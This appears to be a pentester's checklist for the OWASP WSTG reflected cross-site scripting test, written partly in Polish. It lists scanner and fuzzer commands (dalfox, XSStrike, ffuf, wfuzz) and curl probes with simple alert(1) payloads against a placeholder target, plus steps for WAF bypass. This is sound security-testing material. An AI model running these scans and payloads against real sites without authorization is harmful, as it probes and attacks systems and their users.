================================================================================
WSTG-INPV-01 — Testing for Reflected Cross Site Scripting
================================================================================
CELE:
- Identify variables that are reflected in responses
- Assess the input they accept and the encoding that gets applied on return

================================================================================
KOMENDY
================================================================================

# --- dalfox - automatyczny skaner XSS ---
dalfox url "https://TARGET/search?q=FUZZ" -o output_dalfox.txt
dalfox url "https://TARGET" --crawl -o output_dalfox_crawl.txt

# --- XSStrike ---
python3 xsstrike.py -u "https://TARGET/search?q=test" --crawl
python3 xsstrike.py -u "https://TARGET/search?q=test" --fuzzer

# --- kxss - szybki skaner reflected params ---
echo "https://TARGET" | gau | kxss

# --- Reczne testowanie podstawowe ---
curl -s "https://TARGET/search?q=<script>alert(1)</script>" | grep -i "<script>alert"
curl -s "https://TARGET/search?q=\"onmouseover=alert(1)" | grep -i "onmouseover"
curl -s "https://TARGET/search?q=<img src=x onerror=alert(1)>" | grep -i "onerror"

# --- Sprawdzenie kontekstu odbicia ---
curl -s "https://TARGET/search?q=UNIQUE_CANARY_STRING" | grep -c "UNIQUE_CANARY_STRING"

================================================================================
KOMENDY Z WORDLISTAMI
================================================================================

# --- ffuf z XSS payloads (PayloadsAllTheThings) ---
ffuf -u "https://TARGET/search?q=FUZZ" -w "Desktop/WSTG/PayloadsAllTheThings-master/XSS Injection/Intruders/xss_alert.txt" -fr "not found" -o output_ffuf_xss.json

# --- ffuf z JHADDIX XSS ---
ffuf -u "https://TARGET/search?q=FUZZ" -w "Desktop/WSTG/PayloadsAllTheThings-master/XSS Injection/Intruders/JHADDIX_XSS.txt" -fr "not found" -o output_ffuf_jhaddix.json

# --- ffuf z XSS Polyglots ---
ffuf -u "https://TARGET/search?q=FUZZ" -w "Desktop/WSTG/PayloadsAllTheThings-master/XSS Injection/Intruders/XSS_Polyglots.txt" -fr "not found" -o output_ffuf_polyglots.json

# --- wfuzz z SecLists XSS ---
wfuzz -c -z file,"Desktop/WSTG/SecLists-master/Fuzzing/XSS/robot-friendly/XSS-BruteLogic.txt" --hl 0 "https://TARGET/search?q=FUZZ"

# --- wfuzz z PortSwigger cheatsheet ---
wfuzz -c -z file,"Desktop/WSTG/SecLists-master/Fuzzing/XSS/robot-friendly/XSS-Cheat-Sheet-PortSwigger.txt" --hl 0 "https://TARGET/search?q=FUZZ"

# --- ffuf z fuzzdb XSS ---
ffuf -u "https://TARGET/search?q=FUZZ" -w Desktop/WSTG/fuzzdb-master/attack/xss/xss-rsnake.txt -fr "not found" -o output_ffuf_fuzzdb_xss.json

# --- ffuf z BruteLogic XSS ---
ffuf -u "https://TARGET/search?q=FUZZ" -w "Desktop/WSTG/PayloadsAllTheThings-master/XSS Injection/Intruders/BRUTELOGIC-XSS-STRINGS.txt" -fr "not found" -o output_ffuf_brutelogic.json

# --- Burp Intruder z event handlers ---
ffuf -u "https://TARGET/search?q=FUZZ" -w "Desktop/WSTG/PayloadsAllTheThings-master/XSS Injection/Intruders/0xcela_event_handlers.txt" -o output_ffuf_events.json

================================================================================
WERYFIKACJA MANUALNA (Burp Suite / Przegladarka / DevTools)
================================================================================
1. Zidentyfikuj wszystkie parametry odbijane w odpowiedzi (wstaw unikalne canary)
2. Sprawdz kontekst odbicia: HTML body, atrybut, JavaScript, URL
3. Testuj rozne kodowania: URL encode, double encode, HTML entities
4. Sprawdz Content-Type odpowiedzi i CSP headery
5. Testuj z Burp Repeater modyfikujac payloady pod kontekst
6. Sprawdz czy WAF blokuje - testuj bypass techniki
7. Przetestuj w przegladarce czy payload sie wykonuje (alert/console.log)
8. Sprawdz X-XSS-Protection i inne headery ochronne
